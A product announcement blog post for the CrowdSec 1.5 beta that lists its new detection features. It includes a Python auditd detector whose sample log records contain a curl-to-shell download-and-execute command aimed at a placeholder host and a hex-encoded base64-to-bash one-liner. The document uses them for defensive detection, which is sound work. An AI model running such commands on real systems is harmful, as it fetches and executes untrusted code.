We are excited to share that CrowdSec 1.5 will be dropping in July with tons of new features and capabilities. Before we fully launch it, we will first be sharing the beta version on April 1st with some of our community members so they can test out the biggest version of CrowdSec since 1.0. Take a look at what will be in this version; at the very bottom, you can sign up to be one of the first to try it out.
Polling API Integration
With the polling API, the Console can now send orders to the CrowdSec instances, allowing users to manage their decisions (the IPs banned at a given time). Let’s dive into what that means.
Real-time decisions management
This is very useful for users with a lot of instances. For example, if you have 500 instances and want to ban an IP on all your machines, you would typically need some sort of automation, such as a script, to do it. Now, you can easily do it from the Console, from the comfort of a single page.
Teaser: securely configure and customize the fleet of instances from the Console
In the future, the polling API feature will allow users to set up parsers and scenarios directly from the CrowdSec Console.
New Blocklist API
We recently announced the external IP blocklists, which allow all Console users to subscribe to at least 2 third-party blocklists selected by our expert team, as well as 3 premium blocklists for our Enterprise users. We have since gathered a large amount of significant data, which has allowed us to build bigger blocklists. The blocklists are more robust and have no performance impact when you subscribe to them.
Kubernetes audit acquisition
The feature we presented at Kubehuddle UK 2022 is finally here:
We could already protect services within Kubernetes but now we can detect malicious behaviors at the cluster level: privileged pod creation, exec into a pod, mounting a sensitive host folder, anonymous API access, API brute force etc.
S3 audit acquisition
CrowdSec now supports reading logs stored in an S3 bucket, allowing you to process logs generated by AWS services (such as ALB access logs or CloudFront logs).
Auditd support
Allows detecting “Post Exploitation Behaviors”, among which:
- base64 + interpreter (perl/bash/python)
- curl/wget and exec
- pkill execve bursts
- rm execve bursts
- exec from suspicious locations
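As an added illustration (not CrowdSec's own parsers or scenarios), here is a small Python detector that applies the patterns listed above to constructed raw auditd EXECVE records, including the hex-encoded argv values auditd emits for arguments that contain spaces; thresholds, directory lists and sample records are assumptions chosen for the example.

```python
import os
import re

INTERPRETERS, DOWNLOADERS = {"sh", "bash", "perl", "python", "python3"}, {"curl", "wget"}
SUSPICIOUS_DIRS, BURST_BINARIES = ("/tmp/", "/dev/shm/", "/var/tmp/"), {"pkill", "rm"}
BURST_THRESHOLD, BURST_WINDOW = 5, 10.0  # this many execs within this many seconds
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
TS_RE = re.compile(r"msg=audit\((\d+\.\d+):\d+\)")

def parse_record(line):
    """Split one raw auditd record into a dict; hex-encoded argv values are decoded back to text."""
    fields = {}
    for key, val in FIELD_RE.findall(line):
        if val.startswith('"'):
            fields[key] = val.strip('"')
        elif re.fullmatch(r"a\d+", key) and re.fullmatch(r"(?:[0-9A-Fa-f]{2})+", val):
            fields[key] = bytes.fromhex(val).decode(errors="replace")
        else:
            fields[key] = val
    m = TS_RE.search(line)
    fields["_ts"] = float(m.group(1)) if m else 0.0
    return fields

def command_tokens(fields):  # basenames of every argv word, also split on pipes/separators
    argv = " ".join(fields.get(f"a{i}", "") for i in range(int(fields.get("argc", 0))))
    return {os.path.basename(t) for t in re.split(r"[\s|;&]+", argv) if t}

def detect(lines):  # returns (rule, detail) pairs for the behaviors listed above
    alerts, recent = [], {}
    for f in (parse_record(line) for line in lines):
        if f.get("type") != "EXECVE":
            continue
        toks, binary = command_tokens(f), os.path.basename(f.get("a0", ""))
        if f.get("a0", "").startswith(SUSPICIOUS_DIRS):
            alerts.append(("exec_from_suspicious_location", f["a0"]))
        if "base64" in toks and toks & INTERPRETERS:
            alerts.append(("base64_plus_interpreter", " ".join(sorted(toks & INTERPRETERS))))
        if toks & DOWNLOADERS and toks & INTERPRETERS:
            alerts.append(("download_and_exec", " ".join(sorted(toks & DOWNLOADERS))))
        if binary in BURST_BINARIES:  # sliding window; fire once when the threshold is hit
            recent[binary] = [t for t in recent.get(binary, []) if f["_ts"] - t < BURST_WINDOW] + [f["_ts"]]
            if len(recent[binary]) == BURST_THRESHOLD:
                alerts.append((f"{binary}_execve_burst", BURST_THRESHOLD))
    return alerts

# Constructed sample records (not a real capture); the second record's a2 is hex-encoded as auditd would emit it.
SAMPLE = [
    'type=EXECVE msg=audit(1700000000.100:101): argc=1 a0="/dev/shm/.x/run"',
    'type=EXECVE msg=audit(1700000001.000:102): argc=3 a0="bash" a1="-c" a2=6563686F2061476B3D207C20626173653634202D64207C2062617368',
    'type=EXECVE msg=audit(1700000002.000:103): argc=3 a0="sh" a1="-c" a2="curl http://example.invalid/p.sh | sh"',
] + [f'type=EXECVE msg=audit(17000000{10+i}.000:{104+i}): argc=2 a0="rm" a1="/var/log/f{i}"' for i in range(5)]
```

Running `detect(SAMPLE)` yields one alert per listed behavior; the rm burst fires only on the fifth execution inside the window, so a single deletion is not reported.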
CrowdSec CTI API helpers
Query the CTI from parsers and scenarios and react differently based on an IP's reputation, classification, and/or known false positives.
This new CTI API makes CrowdSec and the CTI more interactive with each other, giving users much more information on a given IP: for example, what the machine is doing, what kind of activity it is engaged in, and what kinds of attacks it has received. CrowdSec can now query all this data in real time, which helps users detect false positives and also reduces alert fatigue.
Alert fatigue is reduced not only in the Console but also in your own software: alerts are only sent once for the same malicious IP, and each alert states how confident we are about the activity that IP is performing.
AWS CloudTrail Scenarios
Thanks to 1.5’s new behavior detection capabilities, we were able to create an advanced AWS CloudTrail scenario that helps you detect and better understand what’s happening in your cloud.
- Detect AWS CloudTrail configuration change
- Detect AWS Config configuration change
- Detect AWS console authentication failure
- Detect AWS IAM policy change
- Detect AWS KMS key deletion
- Detect login without MFA to the AWS console
- Detect AWS NACL change
- Detect AWS Network Gateway change
- Detect AWS root account usage
- Detect AWS route table change
- Detect AWS S3 bucket policy change
- Detect AWS Security Group change
- Detect AWS API unauthorized calls
- Detect AWS VPC change
Feature flag support
This new feature allows us to have some features within the Security Engine that are disabled by default but can be activated manually by the user.
This will facilitate the safe inclusion of beta features and give the community more chances to preview what’s coming and help us test it in diverse use cases.
Detection Engine improvements
- Conditional buckets: an improvement of our behavior detection system that allows more complex expressions in the alert-triggering mechanism
- Event data stash: allows parsers to capture data for future enrichment, adding the capability to detect advanced malicious behaviors
CAPI Whitelist
While the community blocklist is highly curated, and designed to avoid false positives, sometimes a shared IP used by both innocent and malicious actors will end up in it, so we’ve added the capability to create whitelists that also apply to the community blocklist.
Conclusion
We are rolling out the beta version on April 1st and will allow a handful of our community members to test it out. If you are interested in being one of the first to test it out and give us your feedback, contact us! We will allow all testers to have 2 months free of all the new features as well as premium ones, as thanks for helping us with this new version.